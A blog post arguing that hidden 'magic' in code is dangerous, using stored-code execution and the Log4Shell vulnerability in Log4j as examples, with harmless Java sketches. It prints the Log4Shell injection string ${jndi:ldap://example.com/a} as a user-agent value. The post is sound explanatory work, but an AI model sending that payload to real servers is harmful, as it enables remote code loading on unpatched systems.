2021-12-19

The Perils of Programming Magic

Abstractions are a necessary part of software development. Without them, many everyday tasks would become absurdly repetitive.

Imagine building an e-commerce store for books and writing separate code for each title, instead of writing code once for the concept of a “book” and reusing it for every title.

The very concept of a “user” in any application is also an abstraction. We wouldn’t write code for every person who signs up to use our system.

Abstractions provide conveniences that make software development possible.

But like most things in life, we can always take a good thing too far. Sometimes, the conveniences we chase aren’t worth the cost or risk.

A good example of this is putting code in a database. I’ve seen a PHP application load more PHP code from a database and then execute it immediately. I’ve also had a marketing person, with just enough coding ability to be dangerous, ask us to execute JavaScript they had put into a CMS.

The only logical reason to perform either of these tasks is for convenience. Putting code into source control, getting it reviewed, testing it, and deploying it is a process. Putting code in a database conveniently avoids that process.

Except! That process exists for a damn good reason.

The process makes sure that the code actually works. It makes sure we can trace the history of that code. It makes sure we can roll back the code to a working state if we ever ship something horribly broken.

Bypassing this process for convenience is a terrible idea.

Let’s look at a more recent example: the series of vulnerabilities in Log4j.

Log4j is a logging library. If I want my application to save some text to a log, I can tell Log4j to do so. It provides some nice conveniences, such as letting me mark some messages as errors and others as debug. This lets me configure things to display more log messages while I’m developing, which helps me with my development. It also lets me configure things to hide those messages in production so my production logs aren’t cluttered with unnecessary messages.

It is simple yet useful functionality, which is why the library is used so widely.
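To make the level idea concrete, here is a minimal, self-contained sketch of level filtering. It is a toy stand-in written for illustration, not Log4j’s API: the `Level` enum, the `MiniLogger` class, and its `threshold` parameter are hypothetical names. The same logging calls run in both environments, and only the configured threshold decides which messages appear.

```java
import java.util.ArrayList;
import java.util.List;

class LevelFilterSketch {
    // Hypothetical severity levels, ordered from least to most severe.
    enum Level { DEBUG, INFO, ERROR }

    // Toy logger (not Log4j): keeps any message at or above its threshold.
    static class MiniLogger {
        private final Level threshold;
        final List<String> lines = new ArrayList<>();

        MiniLogger(Level threshold) {
            this.threshold = threshold;
        }

        void log(Level level, String message) {
            // Messages below the threshold are silently dropped.
            if (level.compareTo(threshold) >= 0) {
                lines.add(level + " " + message);
            }
        }
    }

    public static void main(String[] args) {
        // Development: show everything, including debug output.
        MiniLogger dev = new MiniLogger(Level.DEBUG);
        // Production: hide debug output to keep logs uncluttered.
        MiniLogger prod = new MiniLogger(Level.INFO);

        for (MiniLogger logger : List.of(dev, prod)) {
            logger.log(Level.DEBUG, "cart contents: 3 items");
            logger.log(Level.ERROR, "payment service timed out");
        }

        System.out.println(dev.lines);  // [DEBUG cart contents: 3 items, ERROR payment service timed out]
        System.out.println(prod.lines); // [ERROR payment service timed out]
    }
}
```

The application code never changes between environments; only the configuration does, which is exactly the kind of convenience that makes a logging library worth using.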

The problem is the additional magic layered on top of it.

The first major vulnerability, discovered last week, was the Log4Shell issue. A reasonable thing to log is the user agent of a visitor to your web application. This lets us know important information, like what browser people are using.

log.info("Request User Agent:{}", userAgent);

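Unfortunately, Log4j also scanned this text for special markers and performed additional logic when it found them. If someone set their user agent to ${jndi:ldap://example.com/a}, Log4j would effectively load code from that URL. Since visitors choose their own user agent, any visitor could make the server fetch code from a location they control.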
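A toy model helps show why this is dangerous. The sketch below is not Log4j’s code; it is a deliberately simplified, hypothetical `MagicLoggerSketch` that fills in the `{}` placeholder and then scans the result for `${prefix:argument}` markers, handing them to a lookup handler. Instead of contacting a server, its hypothetical `jndi` handler only records the URL it would have fetched. The point is that the marker arrives inside the user agent, which is attacker-controlled data, and still gets interpreted.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

class MagicLoggerSketch {
    // Matches markers such as ${jndi:ldap://example.com/a}.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{(\\w+):([^}]*)\\}");

    // Records lookups that a real implementation would have performed.
    static final List<String> attemptedFetches = new ArrayList<>();

    // Hypothetical "magic" logger: fills in the {} placeholder, then
    // interprets any ${...} markers found in the resulting text.
    static String info(String template, String arg) {
        String message = template.replace("{}", arg);
        Matcher m = LOOKUP.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String prefix = m.group(1);
            String argument = m.group(2);
            String replacement;
            if (prefix.equals("jndi")) {
                // A real JNDI lookup would contact this URL; we only record it.
                attemptedFetches.add(argument);
                replacement = "<fetched " + argument + ">";
            } else {
                // Unknown prefix: leave the marker untouched.
                replacement = m.group();
            }
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        String userAgent = "${jndi:ldap://example.com/a}";
        System.out.println(info("Request User Agent:{}", userAgent));
        // Request User Agent:<fetched ldap://example.com/a>
        System.out.println(attemptedFetches); // [ldap://example.com/a]
    }
}
```

The developer only asked to log a string, yet the logger decided on its own to act on part of it.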

When most developers need a message logged, they just want that message logged. Anything additional is an edge case at best. Those developers are usually not expecting additional “magic” to come into effect with their logging.

This situation would have been a lot better if there had been less magic and the logic had been split into explicit functions.

userAgent = log.jndiLookup(userAgent);
log.info("Request User Agent:{}", userAgent);

When the function is split up, it becomes clear to the programmer that they need to sanitize the text in some way or verify the URL. Everyone who doesn’t need that functionality is safer with a simple logging function. Everyone who does need that functionality can still access it, with slightly less convenience.
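Here is one way the explicit version could look, again as a sketch with hypothetical names rather than anything Log4j provides. `info` only substitutes the placeholder and never interprets the text, so a `${...}` marker is logged literally. The separate, hypothetical `explicitLookup` step is something a caller must opt into, and it refuses any URL whose scheme and host are not on an allowlist. The allowlisted host `directory.internal.example` is made up for illustration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

class ExplicitLoggingSketch {
    // Plain logging: the argument is inserted verbatim and never interpreted.
    static String info(String template, String arg) {
        return template.replace("{}", arg);
    }

    // Hypothetical allowlist of directory servers a caller trusts.
    static final Set<String> ALLOWED_HOSTS = Set.of("directory.internal.example");

    // Verifies the URL before any lookup: ldap scheme and allowlisted host only.
    static boolean isAllowedLookupUrl(String url) {
        try {
            URI uri = new URI(url);
            return "ldap".equals(uri.getScheme())
                    && uri.getHost() != null
                    && ALLOWED_HOSTS.contains(uri.getHost());
        } catch (URISyntaxException e) {
            return false; // unparseable input is rejected, not guessed at
        }
    }

    // Hypothetical opt-in lookup; a real one would query the directory here.
    static String explicitLookup(String url) {
        if (!isAllowedLookupUrl(url)) {
            throw new IllegalArgumentException("Refusing lookup for untrusted URL: " + url);
        }
        return "<looked up " + url + ">";
    }

    public static void main(String[] args) {
        String userAgent = "${jndi:ldap://example.com/a}";
        // The marker is logged as plain text; nothing is fetched.
        System.out.println(info("Request User Agent:{}", userAgent));
        // Request User Agent:${jndi:ldap://example.com/a}

        System.out.println(isAllowedLookupUrl("ldap://example.com/a"));                // false
        System.out.println(isAllowedLookupUrl("ldap://directory.internal.example/a")); // true
    }
}
```

The cost is one extra call for the rare code that genuinely needs a lookup; the benefit is that the common case, logging a string, can no longer trigger network access.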

Combining this logic into a single function created a number of issues. What could have been simple code was suddenly a lot more complex. People who thought they were using a simple function were unaware of that complexity. Side effects were inevitable, and in this case those side effects came in the form of a major security vulnerability.

This is why I don’t think the primary problem here was technical. The symptom, a security issue, was technical. The real problem is our philosophy of what counts as good code. Many people consider good code to be code that implements something in as few lines as possible. The result of this is programming magic.

I prefer code to be more explicit, as in the example above. Writing explicit code does result in more lines, but it is easier to understand and easier to work with.


Professor Beekums Blog
